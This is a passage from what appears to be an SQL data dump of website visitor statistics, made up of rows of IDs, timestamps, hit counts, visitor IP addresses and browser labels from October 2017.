0,0,'46.229.168.75','other'),(165489,1507841232,1,1,0,0,'164.132.162.153','other'),(165490,1507841290,1,1,0,0,'46.229.168.80','other'),(165491,1507841336,1,1,0,0,'46.229.168.77','other'),(165492,1507841449,1,1,0,0,'46.229.168.67','other'),(165493,1507841642,4,4,0,0,'46.229.168.66','other'),(165494,1507841736,1,1,0,0,'46.229.168.69','other'),(165495,1507841746,1,0,1,0,'66.249.64.29',''),(165496,1507841785,1,1,0,0,'46.229.168.76','other'),(165497,1507841831,2,2,0,0,'46.229.168.72','other'),(165498,1507841920,1,1,0,0,'46.229.168.71','other'),(165499,1507841973,1,1,0,0,'141.8.142.74','other'),(165500,1507842082,1,1,0,0,'217.182.132.192','other'),(165501,1507842086,1,1,0,0,'46.229.168.78','other'),(165502,1507842105,1,1,0,0,'217.182.132.59','other'),(165503,1507842994,1,0,1,0,'66.249.64.30',''),(165504,1507843064,1,1,0,0,'141.8.142.74','other'),(165505,1507843168,1,0,1,0,'66.249.64.29',''),(165506,1507843497,1,1,0,0,'51.255.65.23','other'),(165507,1507843837,1,1,0,0,'51.255.71.131','other'),(165508,1507843915,1,1,0,0,'54.81.6.121','other'),(165509,1507844371,1,1,0,0,'51.255.65.71','other'),(165510,1507845060,1,1,0,0,'51.255.65.85','other'),(165511,1507845351,1,1,0,0,'176.31.231.10','other'),(165512,1507845434,1,1,0,0,'51.255.65.28','other'),(165513,1507845584,1,1,0,0,'217.182.132.190','other'),(165514,1507846208,1,1,0,0,'217.182.132.148','other'),(165515,1507846262,1,0,1,0,'66.249.70.25',''),(165516,1507846264,2,1,1,0,'66.249.70.27',''),(165517,1507846389,1,1,0,0,'217.182.132.86','other'),(165518,1507846391,1,1,0,0,'66.249.64.30','chrome'),(165519,1507846589,1,1,0,0,'137.74.207.161','other'),(165520,1507846865,1,1,0,0,'51.255.65.95','other'),(165521,1507847433,1,1,0,0,'51.255.65.25','other'),(165522,1507847464,1,1,0,0,'217.182.132.183','other'),(165523,1507847750,1,1,0,0,'217.182.132.62','other'),(165524,1507847805,1,1,0,0,'51.255.71.122','other'),(165525,1507847908,2,2,0,0,'178.154.171.88','other'),(165526,1507847964,1,1,0,0,'51.255.65.72','other'),(165527,1507848056,1,1,0,0,'217.182.132.52','other'),(165528,1507848209,1,1,0,0,'216.244.66.237','other'),(165529,1507848381,1,1,0,0,'51.255.65.4','other'),(165530,1507848728,1,1,0,0,'217.182.132.84','other'),(165531,1507849156,1,1,0,0,'217.182.132.90','other'),(165532,1507849323,1,1,0,0,'37.9.113.182','other'),(165533,1507849910,1,1,0,0,'217.69.133.5','other'),(165534,1507849924,1,1,0,0,'51.255.65.63','other'),(165535,1507850155,1,1,0,0,'217.182.132.29','other'),(165536,1507850184,1,1,0,0,'51.255.65.62','other'),(165537,1507850196,1,1,0,0,'217.182.132.150','other'),(165538,1507850457,1,1,0,0,'66.249.70.25','chrome'),(165539,1507850516,1,1,0,0,'51.255.71.101','other'),(165540,1507850697,1,0,1,0,'66.249.70.29',''),(165541,1507851091,1,1,0,0,'8.29.198.25','other'),(165542,1507851206,1,1,0,0,'51.255.65.22','other'),(165543,1507851258,1,0,1,0,'66.249.64.30',''),(165544,1507851263,1,0,1,0,'66.249.64.29',''),(165545,1507851422,1,1,0,0,'217.182.132.96','other'),(165546,1507851545,1,1,0,0,'217.182.132.152','other'),(165547,1507852214,1,1,0,0,'66.249.70.25','chrome'),(165548,1507852226,1,1,0,0,'66.249.64.30','chrome'),(165549,1507852338,1,1,0,0,'217.182.132.58','other'),(165550,1507852955,1,1,0,0,'157.55.39.111','other'),(165551,1507853302,1,1,0,0,'51.255.65.38','other'),(165552,1507853583,1,1,0,0,'66.249.70.27','chrome'),(165553,1507853759,1,1,0,0,'66.249.70.29','chrome'),(165554,1507853803,1,1,0,0,'51.255.71.113','other'),(165555,1507853998,1,1,0,0,'51.255.65.19','other'),(165556,1507854006,1,1,0,0,'141.8.142.74','other'),(165557,1507854141,1,1,0,0,'51.255.65.79','other'),(165558,1507854325,1,1,0,0,'164.132.162.155','other'),(165559,1507854590,1,1,0,0,'89.178.6.166','msie'),(165560,1507855738,1,1,0,0,'51.255.65.78','other'),(165561,1507856111,1,1,0,0,'51.255.65.62','other'),(165562,1507856329,1,1,0,0,'46.4.58.130','other'),(165563,1507856674,1,1,0,0,'217.182.132.87','other'),(165564,1507857112,1,1,0,0,'178.154.171.88','other'),(165565,1507857439,1,1,0,0,'217.182.132.86','other'),(165566,1507857544,1,1,0,0,'217.182.132.51','other'),(165567,1507857555,1,0,1,0,'66.249.70.29',''),(165568,1507857610,1,1,0,0,'51.255.65.30','other'),(165569,1507857857,1,1,0,0,'51.255.71.123','other'),(165570,1507858141,4,4,0,0,'178.154.171.88','other'),(165571,1507858486,1,1,0,0,'51.255.65.94','other'),(165572,1507859029,1,1,0,0,'217.182.132.88','other'),(165573,1507859060,1,1,0,0,'137.74.201.108','other'),(165574,1507859324,1,1,0,0,'157.55.39.143','other'),(165575,1507859473,1,1,0,0,'35.184.240.13','firefox'),(165576,1507859980,1,1,0,0,'51.255.65.37','other'),(165577,1507859994,1,1,0,0,'217.182.132.34','other'),(165578,1507860452,1,1,0,0,'217.182.132.32','other'),(165579,1507860629,1,1,0,0,'217.182.132.14','other'),(165580,1507860925,1,1,0,0,'217.69.133.2','other'),(165581,1507861032,1,1,0,0,'217.182.132.5','other'),(165582,1507861176,1,1,0,0,'217.182.132.28','other'),(165583,1507861186,1,1,0,0,'141.8.142.74','other'),(165584,1507861794,1,1,0,0,'178.154.171.88','other'),(165585,1507861907,1,1,0,0,'51.255.65.95','other'),(165586,1507861908,1,1,0,0,'217.182.132.23','other'),(165587,1507861924,1,1,0,0,'8.29.198.25','other'),(165588,1507862160,1,1,0,0,'217.182.132.28','other'),(165589,1507862415,1,1,0,0,'51.255.65.46','other'),(165590,1507862718,1,1,0,0,'141.8.142.74','other'),(165591,1507862780,1,1,0,0,'51.255.71.130','other'),(165592,1507863097,1,1,0,0,'51.255.65.63','other'),(165593,1507863399,1,1,0,0,'157.55.39.143','other'),(165594,1507863672,1,1,0,0,'51.255.65.51','other'),(165595,1507863845,1,1,0,0,'51.255.65.10','other'),(165596,1507864703,1,1,0,0,'141.8.142.74','other'),(165597,1507864750,1,1,0,0,'178.154.171.88','other'),(165598,1507865747,1,1,0,0,'141.8.142.74','other'),(165599,1507865934,1,0,1,0,'66.249.70.25',''),(165600,1507865962,1,0,1,0,'66.249.70.29',''),(165601,1507866351,1,1,0,0,'178.154.171.88','other'),(165602,1507866472,1,1,0,0,'217.182.132.73','other'),(165603,1507866682,1,1,0,0,'66.249.64.28','chrome'),(165604,1507866703,1,1,0,0,'217.182.132.157','other'),(165605,1507866730,1,1,0,0,'217.182.132.148','other'),(165606,1507866790,1,1,0,0,'217.182.132.72','other'),(165607,1507866860,1,1,0,0,'51.255.71.128','other'),(165608,1507866972,1,1,0,0,'51.255.65.39','other'),(165609,1507867068,1,1,0,0,'51.255.65.37','other'),(165610,1507867317,1,1,0,0,'141.8.142.74','other'),(165611,1507867318,1,1,0,0,'217.182.132.175','other'),(165612,1507867450,1,1,0,0,'164.132.162.156','other'),(165613,1507867597,1,1,0,0,'51.255.65.60','other'),(165614,1507867598,1,0,1,0,'66.249.70.27',''),(165615,1507867605,1,1,0,0,'217.182.132.34','other'),(165616,1507867690,1,1,0,0,'178.154.171.88','other'),(165617,1507867861,1,0,1,0,'66.249.70.25',''),(165618,1507867886,1,1,0,0,'51.255.65.97','other'),(165619,1507868033,1,1,0,0,'51.255.71.117','other'),(165620,1507868075,1,1,0,0,'51.255.65.66','other'),(165621,1507868402,1,1,0,0,'141.8.142.74','other'),(165622,1507868417,1,1,0,0,'87.250.224.46','other'),(165623,1507868667,1,1,0,0,'66.249.70.29','chrome'),(165624,1507868854,1,1,0,0,'51.255.65.49','other'),(165625,1507868855,1,1,0,0,'51.255.65.13','other'),(165626,1507869011,1,1,0,0,'51.255.65.27','other'),(165627,1507869014,1,1,0,0,'213.180.203.8','other'),(165628,1507869035,1,1,0,0,'46.48.13.161','chrome'),(165629,1507869175,1,1,0,0,'137.74.207.110','other'),(165630,1507869187,1,1,0,0,'217.182.132.24','other'),(165631,1507869216,1,1,0,0,'157.55.39.111','other'),(165632,1507869723,1,1,0,0,'51.255.65.29','other'),(165633,1507870013,1,1,0,0,'141.8.142.74','other'),(165634,1507870148,1,1,0,0,'51.255.65.64','other'),(165635,1507870253,1,1,0,0,'66.249.70.25','chrome'),(165636,1507870648,1,1,0,0,'37.9.113.100','other'),(165637,1507870757,1,0,1,0,'66.249.64.30',''),(165638,1507870889,3,3,0,0,'144.76.29.66','other'),(165639,1507870996,1,1,0,0,'217.182.132.97','other'),(165640,1507871227,1,1,0,0,'217.182.132.29','other'),(165641,1507871260,1,1,0,0,'217.182.132.70','other'),(165642,1507871381,1,1,0,0,'51.255.65.38','other'),(165643,1507871470,1,1,0,0,'141.8.142.74','other'),(165644,1507871933,1,1,0,0,'217.69.133.3','other'),(165645,1507871976,2,2,0,0,'178.154.171.60','other'),(165646,1507872212,1,1,0,0,'217.182.132.79','other'),(165647,1507872237,1,1,0,0,'51.255.65.43','other'),(165648,1507872282,1,1,0,0,'51.255.65.86','other'),(165649,1507872597,1,1,0,0,'51.255.65.90','other'),(165650,1507872760,1,1,0,0,'8.29.198.25','other'),(165651,1507872779,2,2,0,0,'217.182.132.149','other'),(165652,1507873400,1,1,0,0,'91.196.178.70','chrome'),(165653,1507873506,1,1,0,0,'66.249.70.27','chrome'),(165654,1507873522,1,1,0,0,'51.255.71.101','other'),(165655,1507873655,1,1,0,0,'91.196.178.38','chrome'),(165656,1507874022,1,1,0,0,'51.255.65.15','other'),(165657,1507874046,1,1,0,0,'51.255.71.129','other'),(165658,1507874173,1,1,0,0,'217.182.132.29','other'),(165659,1507874328,1,1,0,0,'217.182.132.70','other'),(165660,1507874819,1,1,0,0,'51.255.65.89','other'),(165661,1507875119,1,1,0,0,'157.55.39.111','other'),(165662,1507875249,1,1,0,0,'51.255.71.131','other'),(165663,1507875359,1,1,0,0,'217.182.132.16','other'),(165664,1507875364,1,1,0,0,'51.255.65.88','other'),(165665,1507875493,1,0,1,0,'66.249.70.27',''),(165666,1507875614,1,1,0,0,'137.74.207.159','other'),(165667,1507875647,1,1,0,0,'151.80.27.116','other'),(165668,1507875772,1,1,0,0,'51.255.71.129','other'),(165669,1507875903,1,1,0,0,'66.249.64.28','chrome'),(165670,1507876079,1,1,0,0,'37.9.113.182','other'),(165671,1507876168,1,1,0,0,'217.182.132.70','other'),(165672,1507876181,1,1,0,0,'217.182.132.77','other'),(165673,1507876275,1,1,0,0,'216.244.66.237','other'),(165674,1507877182,1,1,0,0,'137.74.207.161','other'),(165675,1507877289,1,1,0,0,'51.255.65.38','other'),(165676,1507877356,1,1,0,0,'199.58.164.122','other'),(165677,1507877377,1,1,0,0,'51.255.65.12','other'),(165678,1507877392,1,1,0,0,'51.255.71.133','other'),(165679,1507877402,1,1,0,0,'51.255.71.117','other'),(165680,1507877440,1,1,0,0,'217.182.132.87','other'),(165681,1507877479,1,0,1,0,'68.180.229.52',''),(165682,1507877480,1,1,0,0,'207.46.13.46','other'),(165683,1507877547,1,1,0,0,'217.182.132.147','other'),(165684,1507877805,1,1,0,0,'217.182.132.82','other'),(165685,1507877951,1,1,0,0,'51.255.65.46','other'),(165686,1507877999,1,1,0,0,'137.74.207.120','other'),(165687,1507878211,1,1,0,0,'178.154.171.88','other'),(165688,1507878231,1,1,0,0,'217.182.132.180','other'),(165689,1507878246,1,1,0,0,'66.249.70.29','chrome'),(165690,1507878394,1,1,0,0,'217.182.132.185','other'),(165691,1507878413,1,1,0,0,'46.219.61.42','chrome'),(165692,1507878761,1,1,0,0,'217.182.132.190','other'),(165693,1507878821,1,1,0,0,'217.182.132.179','other'),(165694,1507878829,1,1,0,0,'51.255.65.59','other'),(165695,1507878869,1,1,0,0,'51.255.65.14','other'),(165696,1507878885,1,1,0,0,'141.8.142.74','other'),(165697,1507879043,1,1,0,0,'87.250.224.46','other'),(165698,1507879072,1,1,0,0,'157.55.39.111','other'),(165699,1507880086,1,1,0,0,'178.154.171.88','other'),(165700,1507880472,1,1,0,0,'180.76.15.21','other'),(165701,1507880602,1,1,0,0,'194.50.254.169','chrome'),(165702,1507880690,1,1,0,0,'164.132.162.155','other'),(165703,1507880793,3,3,0,0,'141.8.142.74','other'),(165704,1507880948,1,1,0,0,'217.69.133.9','other'),(165705,1507881176,1,0,1,0,'66.249.64.29',''),(165706,1507881292,1,1,0,0,'137.74.207.109','other'),(165707,1507881427,1,1,0,0,'51.255.71.125','other'),(165708,1507881578,1,1,0,0,'217.182.132.67','other'),(165709,1507881762,1,1,0,0,'51.255.65.37','other'),(165710,1507881890,1,1,0,0,'178.154.171.88','other'),(165711,1507881962,1,1,0,0,'51.255.71.121','other'),(165712,1507882003,1,1,0,0,'51.255.65.83','other'),(165713,1507882387,1,1,0,0,'217.182.132.56','other'),(165714,1507882591,1,1,0,0,'157.55.39.143','other'),(165715,1507882597,1,1,0,0,'217.182.132.182','other'),(165716,1507882805,1,1,0,0,'217.182.132.28','other'),(165717,1507882828,1,1,0,0,'217.182.132.21','other'),(165718,1507883073,1,1,0,0,'217.182.132.190','other'),(165719,1507883192,1,1,0,0,'51.255.71.98','other'),(165720,1507883202,1,1,0,0,'217.182.132.55','other'),(165721,1507883260,1,1,0,0,'217.182.132.83','other'),(165722,1507883262,1,1,0,0,'178.154.171.88','other'),(165723,1507883359,1,1,0,0,'185.12.11.85','chrome'),(165724,1507883600,1,1,0,0,'8.29.198.27','other'),(165725,1507883668,1,1,0,0,'51.255.71.120','other'),(165726,1507883723,1,1,0,0,'51.255.65.28','other'),(165727,1507884330,1,1,0,0,'141.8.142.74','other'),(165728,1507885016,1,1,0,0,'217.182.132.76','other'),(165729,1507885665,1,1,0,0,'217.182.132.181','other'),(165730,1507885754,1,1,0,0,'217.182.132.153','other'),(165731,1507886357,1,1,0,0,'91.196.178.65','firefox'),(165732,1507886527,1,0,1,0,'66.249.70.25',''),(165733,1507886548,1,1,0,0,'141.8.142.74','other'),(165734,1507886617,1,1,0,0,'151.80.27.116','other'),(165735,1507886706,1,1,0,0,'109.86.72.163','chrome'),(165736,1507886747,1,1,0,0,'217.182.132.180','other'),(165737,1507886756,1,1,0,0,'51.255.65.33','other'),(165738,1507886823,1,1,0,0,'137.74.207.101','other'),(165739,1507887099,1,1,0,0,'51.255.65.36','other'),(165740,1507887689,1,1,0,0,'51.255.65.57','other'),(165741,1507887866,1,1,0,0,'91.196.178.69','chrome'),(165742,1507887883,1,1,0,0,'87.250.224.46','other'),(165743,1507888138,1,1,0,0,'51.255.65.69','other'),(165744,1507888210,1,1,0,0,'66.102.9.27','chrome'),(165745,1507888356,2,2,0,0,'51.255.65.9','other'),(165746,1507888449,1,1,0,0,'217.69.133.9','other'),(165747,1507888764,1,1,0,0,'137.74.207.120','other'),(165748,1507888817,1,1,0,0,'164.132.162.154','other'),(165749,1507888861,1,1,0,0,'178.154.171.88','other'),(165750,1507889066,1,1,0,0,'46.219.57.144','chrome'),(165751,1507889304,1,1,0,0,'51.255.71.131','other'),(165752,1507889316,1,1,0,0,'196.53.59.160','chrome'),(165753,1507889317,1,1,0,0,'141.8.142.74','other'),(165754,1507889380,1,1,0,0,'180.76.15.5','other'),(165755,1507889474,2,2,0,0,'91.196.178.164','chrome'),(165756,1507889552,1,1,0,0,'217.182.132.172','other'),(165757,1507889585,1,1,0,0,'93.171.185.116','chrome'),(165758,1507889830,1,1,0,0,'217.182.132.96','other'),(165759,1507889887,1,1,0,0,'217.182.132.34','other'),(165760,1507889950,1,1,0,0,'217.182.132.186','other'),(165761,1507890283,1,0,1,0,'66.249.70.25',''),(165762,1507890325,1,0,1,0,'66.249.70.29',''),(165763,1507890479,1,1,0,0,'51.255.71.101','other'),(165764,1507890719,1,1,0,0,'178.154.171.88','other'),(165765,1507890725,2,2,0,0,'141.8.142.74','other'),(165766,1507890911,1,1,0,0,'217.182.132.80','other'),(165767,1507891004,1,1,0,0,'217.182.132.7','other'),(165768,1507891194,1,1,0,0,'217.182.132.88','other'),(165769,1507891315,1,1,0,0,'51.255.65.10','other'),(165770,1507891650,1,1,0,0,'164.132.164.180','other'),(165771,1507891803,1,1,0,0,'217.182.132.20','other'),(165772,1507891888,1,1,0,0,'207.46.13.32','other'),(165773,1507891924,1,1,0,0,'87.250.224.46','other'),(165774,1507892273,1,1,0,0,'217.182.132.150','other'),(165775,1507892405,1,1,0,0,'51.255.65.93','other'),(165776,1507892714,1,1,0,0,'217.182.132.83','other'),(165777,1507893002,1,1,0,0,'217.182.132.56','other'),(165778,1507893345,1,1,0,0,'137.74.207.109','other'),(165779,1507893580,1,1,0,0,'162.210.196.100','other'),(165780,1507893851,1,1,0,0,'207.46.13.32','other'),(165781,1507894120,1,1,0,0,'207.46.13.46','other'),(165782,1507894350,1,1,0,0,'91.192.182.21','chrome'),(165783,1507894374,1,1,0,0,'217.182.132.83','other'),(165784,1507894428,1,1,0,0,'141.8.142.74','other'),(165785,1507894434,1,1,0,0,'8.29.198.26','other'),(165786,1507894523,1,1,0,0,'37.9.113.101','other'),(165787,1507894528,1,1,0,0,'37.9.113.157','other'),(165788,1507894798,1,1,0,0,'51.255.65.82','other'),(165789,1507894807,1,0,1,0,'66.249.64.28',''),(165790,1507894965,1,1,0,0,'51.255.65.22','other'),(165791,1507895090,2,2,0,0,'213.133.111.165','other'),(165792,1507895259,1,0,1,0,'66.249.70.25',''),(165793,1507895338,1,1,0,0,'51.255.65.51','other'),(165794,1507895360,1,1,0,0,'178.154.171.88','other'),(165795,1507895452,1,1,0,0,'95.132.110.18','firefox'),(165796,1507895580,1,1,0,0,'217.182.132.178','other'),(165797,1507895655,1,1,0,0,'51.255.65.38','other'),(165798,1507895677,1,1,0,0,'176.105.165.149','chrome'),(165799,1507896162,1,1,0,0,'51.255.71.112','other'),(165800,1507896308,1,1,0,0,'91.196.178.65','firefox'),(165801,1507896924,1,1,0,0,'178.92.250.67','chrome'),(165802,1507897434,1,1,0,0,'87.250.224.46','other'),(165803,1507897756,1,1,0,0,'141.8.132.19','other'),(165804,1507897852,1,1,0,0,'178.92.250.67','chrome'),(165805,1507898041,1,1,0,0,'217.182.132.77','other'),(165806,1507898095,1,1,0,0,'137.74.201.99','other'),(165807,1507898184,1,1,0,0,'137.74.201.108','other'),(165808,1507898548,1,1,0,0,'51.255.71.125','other'),(165809,1507898609,1,1,0,0,'217.182.132.84','other'),(165810,1507898883,1,1,0,0,'51.255.65.9','other'),(165811,1507898952,1,1,0,0,'37.9.113.182','other'),(165812,1507898965,1,1,0,0,'217.182.132.51','other'),(165813,1507899134,2,2,0,0,'87.250.224.46','other'),(165814,1507899196,2,2,0,0,'216.244.66.237','other'),(165815,1507899653,1,1,0,0,'217.182.132.59','other'),(165816,1507899816,1,1,0,0,'217.182.132.56','other'),(165817,1507899858,2,2,0,0,'141.8.142.74','other'),(165818,1507900134,2,2,0,0,'37.9.113.182','other'),(165819,1507900211,1,1,0,0,'217.182.132.17','other'),(165820,1507900303,1,1,0,0,'217.182.132.180','other'),(165821,1507900407,1,0,1,0,'66.249.70.5',''),(165822,1507900439,1,1,0,0,'95.67.79.185','msie'),(165824,1507900440,1,1,0,0,'95.67.79.185','chrome'),(165825,1507900465,1,1,0,0,'141.8.132.19','other'),(165826,1507900484,1,1,0,0,'188.32.129.131','chrome'),(165827,1507900729,1,0,1,0,'66.249.70.27',''),(165828,1507900777,1,1,0,0,'51.255.65.24','other'),(165829,1507900901,1,1,0,0,'217.182.132.193','other'),(165830,1507900938,1,1,0,0,'87.250.224.46','other'),(165831,1507900963,1,1,0,0,'178.92.250.67','chrome'),(165832,1507901079,1,1,0,0,'51.255.64.106','other'),(165833,1507901195,1,1,0,0,'217.182.132.146','other'),(165834,1507901380,1,1,0,0,'51.255.65.16','other'),(165835,1507901462,1,1,0,0,'94.254.242.98','chrome'),(165836,1507901514,1,1,0,0,'217.182.132.182','other'),(165837,1507901521,1,1,0,0,'51.255.71.131','other'),(165838,1507901627,1,1,0,0,'217.182.132.27','other'),(165839,1507901760,3,3,0,0,'141.8.142.74','other'),(165840,1507901978,1,1,0,0,'217.182.132.7','other'),(165841,1507902321,1,1,0,0,'51.255.65.75','other'),(165842,1507902604,1,1,0,0,'217.182.132.32','other'),(165843,1507902665,1,1,0,0,'141.8.142.74','other'),(165844,1507902790,1,1,0,0,'217.182.132.53','other'),(165845,1507903301,1,0,1,0,'66.249.64.29',''),(165846,1507903327,1,1,0,0,'128.69.236.97','msie'),(165847,1507903673,1,1,0,0,'137.74.207.116','other'),(165848,1507903971,1,1,0,0,'51.255.65.85','other'),(165849,1507903984,2,0,2,0,'66.249.70.27',''),(165850,1507904016,1,1,0,0,'51.255.65.4','other'),(165851,1507904076,1,1,0,0,'51.255.65.63','other'),(165852,1507904134,1,1,0,0,'40.77.167.4','other'),(165853,1507904206,1,1,0,0,'178.92.250.67','chrome'),(165854,1507904529,1,1,0,0,'178.154.171.88','other'),(165855,1507904632,1,1,0,0,'188.166.6.200','chrome'),(165856,1507904641,1,1,0,0,'217.182.132.16','other'),(165857,1507904652,1,1,0,0,'207.46.13.46','other'),(165858,1507904719,1,1,0,0,'185.137.18.85','chrome'),(165859,1507905032,1,1,0,0,'217.182.132.87','other'),(165860,1507905277,1,1,0,0,'8.29.198.27','other'),(165861,1507905375,1,1,0,0,'51.255.65.40','other'),(165862,1507905727,1,1,0,0,'137.74.203.194','other'),(165863,1507905752,1,1,0,0,'51.255.65.20','other'),(165864,1507905842,1,1,0,0,'51.255.65.96','other'),(165865,1507905878,1,1,0,0,'217.182.132.50','other'),(165866,1507906321,1,1,0,0,'51.255.65.69','other'),(165867,1507906383,1,1,0,0,'217.182.132.66','other'),(165868,1507906415,1,0,1,0,'66.249.64.29',''),(165869,1507906442,1,1,0,0,'217.182.132.54','other'),(165870,1507906638,1,0,1,0,'66.249.64.28',''),(165871,1507906639,1,1,0,0,'217.182.132.175','other'),(165872,1507906900,1,1,0,0,'51.255.71.129','other'),(165873,1507906911,1,1,0,0,'178.154.171.88','other'),(165874,1507906928,1,1,0,0,'51.255.65.2','other'),(165875,1507906983,1,1,0,0,'217.182.132.82','other'),(165876,1507907076,1,1,0,0,'137.74.201.99','other'),(165877,1507907082,1,1,0,0,'217.182.132.50','other'),(165878,1507907146,1,1,0,0,'51.255.65.73','other'),(165879,1507907340,1,1,0,0,'51.255.71.113','other'),(165880,1507907503,1,1,0,0,'217.182.132.59','other'),(165881,1507907709,1,1,0,0,'141.8.142.74','other'),(165882,1507907747,1,1,0,0,'217.182.132.52','other'),(165883,1507907784,1,1,0,0,'51.255.65.91','other'),(165884,1507907924,1,0,1,0,'66.249.70.27',''),(165885,1507908227,1,1,0,0,'178.154.171.88','other'),(165886,1507908501,1,1,0,0,'51.255.65.45','other'),(165887,1507908524,1,1,0,0,'137.74.201.100','other'),(165888,1507909265,1,1,0,0,'40.77.167.4','other'),(165889,1507909437,1,0,1,0,'66.249.64.28',''),(165890,1507909444,1,1,0,0,'46.48.13.161','chrome'),(165891,1507909459,1,0,1,0,'66.249.64.30',''),(165892,1507909758,1,1,0,0,'51.255.65.13','other'),(165893,1507909800,1,0,1,0,'66.249.70.29',''),(165894,1507909846,1,1,0,0,'217.182.132.51','other'),(165895,1507909981,1,1,0,0,'217.69.133.194','other'),(165896,1507910588,1,1,0,0,'217.182.132.19','other'),(165897,1507910755,1,1,0,0,'51.255.65.24','other'),(165898,1507910930,1,1,0,0,'217.69.133.5','other'),(165899,1507910946,1,1,0,0,'51.255.65.33','other'),(165900,1507911062,1,1,0,0,'217.182.132.30','other'),(165901,1507911101,1,1,0,0,'51.255.65.12','other'),(165902,1507911172,1,1,0,0,'163.172.255.19','chrome'),(165903,1507911173,7,7,0,0,'88.198.16.12','other'),(165904,1507911241,1,1,0,0,'217.182.132.24','other'),(165905,1507911574,1,1,0,0,'51.255.65.11','other'),(165906,1507911616,1,1,0,0,'109.173.60.189','msie'),(165907,1507911654,1,1,0,0,'217.182.132.6','other'),(165908,1507911904,2,0,2,0,'66.249.64.28',''),(165909,1507912516,1,1,0,0,'217.182.132.178','other'),(165910,1507912754,1,1,0,0,'217.182.132.184','other'),(165911,1507913012,1,1,0,0,'217.182.132.150','other'),(165912,1507913031,1,1,0,0,'217.182.132.183','other'),(165913,1507913149,1,0,1,0,'66.249.64.29',''),(165914,1507913166,1,1,0,0,'217.182.132.64','other'),(165915,1507913185,3,3,0,0,'130.211.81.188','other'),(165916,1507913776,1,1,0,0,'51.255.65.97','other'),(165917,1507914123,1,1,0,0,'37.73.199.52','chrome'),(165918,1507914294,1,1,0,0,'217.182.132.37','other'),(165919,1507914306,1,1,0,0,'141.8.142.74','other'),(165920,1507914580,1,1,0,0,'51.255.65.9','other'),(165921,1507914658,1,1,0,0,'51.255.65.12','other'),(165922,1507916111,1,1,0,0,'8.29.198.27','other'),(165923,1507916343,1,1,0,0,'51.255.65.26','other'),(165924,1507917015,3,3,0,0,'141.8.142.74','other'),(165925,1507917104,1,1,0,0,'217.182.132.146','other'),(165926,1507918048,1,1,0,0,'207.46.13.85','other'),(165927,1507918117,1,1,0,0,'51.255.65.31','other'),(165928,1507918491,1,1,0,0,'91.196.178.131','chrome'),(165929,1507918874,1,1,0,0,'178.154.171.88','other'),(165930,1507918896,2,2,0,0,'141.8.142.74','other'),(165931,1507919136,1,1,0,0,'51.255.65.19','other'),(165932,1507919292,1,1,0,0,'51.255.71.117','other'),(165933,1507919541,1,1,0,0,'217.182.132.91','other'),(165934,1507920011,1,1,0,0,'51.255.71.128','other'),(165935,1507920080,1,1,0,0,'217.182.132.58','other'),(165936,1507920280,1,0,1,0,'66.249.70.27',''),(165937,1507920547,1,1,0,0,'51.255.65.71','other'),(165938,1507920691,1,1,0,0,'141.8.142.74','other'),(165939,1507921023,1,1,0,0,'164.132.162.160','other'),(165940,1507921108,1,1,0,0,'51.255.65.45','other'),(165941,1507921223,1,1,0,0,'137.74.207.188','other'),(165942,1507921535,1,1,0,0,'91.196.178.134','chrome'),(165943,1507921820,1,1,0,0,'51.255.71.122','other'),(165944,1507921950,1,1,0,0,'51.255.65.93','other'),(165945,1507922155,1,0,1,0,'66.249.64.28',''),(165946,1507923091,1,1,0,0,'137.74.207.161','other'),(165947,1507923633,1,1,0,0,'217.182.132.86','other'),(165948,1507923896,1,1,0,0,'51.255.65.48','other'),(165949,1507923959,2,0,2,0,'66.249.64.28',''),(165950,1507923964,1,0,1,0,'66.249.64.29',''),(165951,1507923975,1,1,0,0,'51.255.65.37','other'),(165952,1507924024,1,0,1,0,'66.249.70.27',''),(165953,1507924874,1,1,0,0,'217.182.132.170','other'),(165954,1507925546,1,1,0,0,'217.182.132.176','other'),(165955,1507925566,1,1,0,0,'176.101.223.203','firefox'),(165956,1507925658,1,1,0,0,'38.80.27.246','firefox'),(165957,1507925675,1,1,0,0,'38.80.27.223','firefox'),(165958,1507926698,1,1,0,0,'217.182.132.32','other'),(165959,1507926946,1,1,0,0,'8.29.198.27','other'),(165960,1507926971,1,1,0,0,'46.188.24.65','msie'),(165961,1507927324,1,0,1,0,'66.249.70.29',''),(165962,1507927454,2,0,2,0,'66.249.64.28',''),(165963,1507927658,1,1,0,0,'217.182.132.28','other'),(165964,1507927830,1,1,0,0,'217.69.133.3','other'),(165965,1507927927,1,1,0,0,'51.255.65.57','other'),(165966,1507928173,1,1,0,0,'51.255.65.71','other'),(165967,1507928272,1,1,0,0,'51.255.65.28','other'),(165968,1507928465,1,1,0,0,'137.74.207.110','other'),(165969,1507929205,1,0,1,0,'66.249.64.29',''),(165970,1507930177,1,1,0,0,'51.255.65.39','other'),(165971,1507930296,1,1,0,0,'216.244.66.237','other'),(165972,1507930783,1,1,0,0,'51.255.65.52','other'),(165973,1507930944,1,1,0,0,'163.172.255.19','chrome'),(165974,1507931106,1,1,0,0,'178.154.171.88','other'),(165975,1507931108,1,0,1,0,'66.249.64.30',''),(165976,1507931455,1,1,0,0,'217.182.132.67','other'),(165977,1507931503,1,1,0,0,'217.182.132.5','other'),(165978,1507931771,1,1,0,0,'51.255.65.36','other'),(165979,1507932306,1,1,0,0,'141.8.142.74','other'),(165980,1507932450,1,0,1,0,'66.249.64.30',''),(165981,1507932456,1,1,0,0,'51.255.65.73','other'),(165982,1507932707,1,1,0,0,'178.127.219.95','chrome'),(165983,1507932819,1,1,0,0,'51.255.71.115','other'),(165984,1507932943,1,1,0,0,'66.249.64.30','chrome'),(165985,1507933306,1,1,0,0,'217.182.132.149','other'),(165986,1507933360,1,1,0,0,'51.255.65.15','other'),(165987,1507933696,1,1,0,0,'51.255.71.114','other'),(165988,1507933980,1,1,0,0,'137.74.207.114','other'),(165989,1507934110,1,1,0,0,'51.255.65.91','other'),(165990,1507934189,1,1,0,0,'164.132.162.153','other'),(165991,1507934190,1,0,1,0,'66.249.70.29',''),(165992,1507934869,1,1,0,0,'217.182.132.174','other'),(165993,1507935432,1,1,0,0,'217.182.132.6','other'),(165994,1507935678,1,1,0,0,'207.241.231.35','other'),(165995,1507936851,1,1,0,0,'51.255.65.80','other'),(165996,1507937083,1,1,0,0,'216.244.66.237','other'),(165997,1507937142,1,1,0,0,'164.132.164.180','other'),(165998,1507937178,1,1,0,0,'180.76.15.136','other'),(165999,1507937796,1,1,0,0,'217.182.132.149','other'),(166000,1507937805,1,1,0,0,'8.29.198.25','other'),(166001,1507938244,1,0,1,0,'66.249.64.29',''),(166002,1507938307,1,0,1,0,'66.249.70.29',''),(166003,1507939283,1,1,0,0,'51.255.65.77','other'),(166004,1507939437,1,1,0,0,'